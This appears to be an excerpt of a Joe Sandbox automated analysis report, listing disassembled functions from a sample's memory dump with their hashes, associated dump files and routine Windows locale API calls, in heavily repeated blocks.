                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 46f597134efa74e8be3e282570831be78394f5d29fbc446326fc99085b97ee5d
                                                                                                                                                                                                                                                                  • Instruction ID: 4b52e9d6b2352e8a79c521fdfac1d0d6fca3eb1c2a41b72019d5624e793aafa1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46f597134efa74e8be3e282570831be78394f5d29fbc446326fc99085b97ee5d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9572AFB4A0020A9FCF24DF68C891AFEB7B6EF45314F14416DD946A7345D772AE82CB90
                                                                                                                                                                                                                                                                  Function 006AE344 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 0b31bcc3f0ffd5bdf239017ace519ff5dc2b8a3d6c689e828cab6c5969eb227b
                                                                                                                                                                                                                                                                  • Instruction ID: d05cac7b0198553781a93ac388aa4d7da260c676f873609adce17c5bd9ef9581
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b31bcc3f0ffd5bdf239017ace519ff5dc2b8a3d6c689e828cab6c5969eb227b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8B1C27090060A8BCF24AE68C4A16FEBBE7EF56314F14091ED85297381DB37AD42CF95
                                                                                                                                                                                                                                                                  Function 006AE770 Relevance: 1.6, Strings: 1, Instructions: 314COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: e0f3d0b1b7177848c9ea190608e8fd8a6456997b3a862065a676c2d10767692e
                                                                                                                                                                                                                                                                  • Instruction ID: bb94bf6c4afcee08cbc2181661e9077cbbf843b21fc237782a0570aeddbafac4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0f3d0b1b7177848c9ea190608e8fd8a6456997b3a862065a676c2d10767692e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2B1C070A0070A8BDB64AE68C4916FFB7A7AF43300F140A1EE55297391C736ED46CF51
                                                                                                                                                                                                                                                                  Function 006ADF2A Relevance: 1.6, Strings: 1, Instructions: 314COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: b38474da1931c81ca97ac5126a9c32d6e65d5e104c18915d73342cbaf3bfc224
                                                                                                                                                                                                                                                                  • Instruction ID: 3f67e6b8506781c0cbb53cb8dc715f2b5fcc4e81313f504211cb76ff96dd45d3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b38474da1931c81ca97ac5126a9c32d6e65d5e104c18915d73342cbaf3bfc224
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63B1C07090060A8FCB24AF68C4956FFB7A7AF46304F14061ED453A7791CB76AE46CF92
                                                                                                                                                                                                                                                                  Function 006D5242 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(006D53B0,00000001), ref: 006D52B4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                                                                                                                                                  • Opcode ID: cb5f307a371fdcf9544b043b595521e75163e727fb0887db0cd76f07c2bd05ab
                                                                                                                                                                                                                                                                  • Instruction ID: 7537d95ec47c685eba2810d8fb8529d6688709c460f42e779541b1e032a20a79
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb5f307a371fdcf9544b043b595521e75163e727fb0887db0cd76f07c2bd05ab
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47112937A04B059FDB189F38C8915BAB792FF84359B15442EE94787B40E771B942C780
                                                                                                                                                                                                                                                                  Function 006D5951 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,006D55CC,00000000,00000000,?), ref: 006D597D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                  • Opcode ID: a90384fe25be258847e64f9b0c8a8dae53ce64e91190523bc678689606d98598
                                                                                                                                                                                                                                                                  • Instruction ID: b7de8ab37f028a18aeca440ef5d64eb08a55cc360b961e04a6a4015dc528ac03
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a90384fe25be258847e64f9b0c8a8dae53ce64e91190523bc678689606d98598
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11F0F932E10551EBEB286724C895BFA776ADB40364F05442AEC07A7780EA74FD41C5D0
                                                                                                                                                                                                                                                                  Function 006D5303 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(006D5697,00000001), ref: 006D534D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                                                                                                                                                  • Opcode ID: 14ff2c4fd10d1b62430a47e2d31d60f87390cdf1ac99ef05603870469c9539f1
                                                                                                                                                                                                                                                                  • Instruction ID: 18a8b89592bc2cf3b481b4785838d981953411597624cb2955f9fd70fd973248
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14ff2c4fd10d1b62430a47e2d31d60f87390cdf1ac99ef05603870469c9539f1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16F0FC36A007045FDB145F35D881A7A7B92EF853A8F16482EF94647B50E6B19D41CA50
                                                                                                                                                                                                                                                                  Function 006C363F Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(Function_00093629,00000001,007038D0,0000000C), ref: 006C3677
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                                                                                                                                                  • Opcode ID: 705f6d227b241a1430b5709e3d9d74d7273a831b57890be44cc7a2d985ce2ccd
                                                                                                                                                                                                                                                                  • Instruction ID: a228f6cdde71d3231aa784eb0a24a28216d75d78df1d467e494fd06b50f6b9e5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 705f6d227b241a1430b5709e3d9d74d7273a831b57890be44cc7a2d985ce2ccd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32F03776A00214EFEB00EF98E842B9D77F1EB46721F10C15EF411AB3A0CB7999008F99
                                                                                                                                                                                                                                                                  Function 006769B1 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002), ref: 006769CA
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                  • Opcode ID: a28c9762826b7eea72700481bedbbaf5732118a7293ea6852edc34cf0f850f60
                                                                                                                                                                                                                                                                  • Instruction ID: 87dff7893b1dcb991c572aaf80673a556cdd3edc0150a9d5f014efc57b7f5b09
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a28c9762826b7eea72700481bedbbaf5732118a7293ea6852edc34cf0f850f60
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84E09273290205A6D7598BBCD91FFEA76A9A70170AF008651F206E52D1D6B4CA00D655
                                                                                                                                                                                                                                                                  Function 006D51C0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(006D50F0,00000001), ref: 006D51F7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
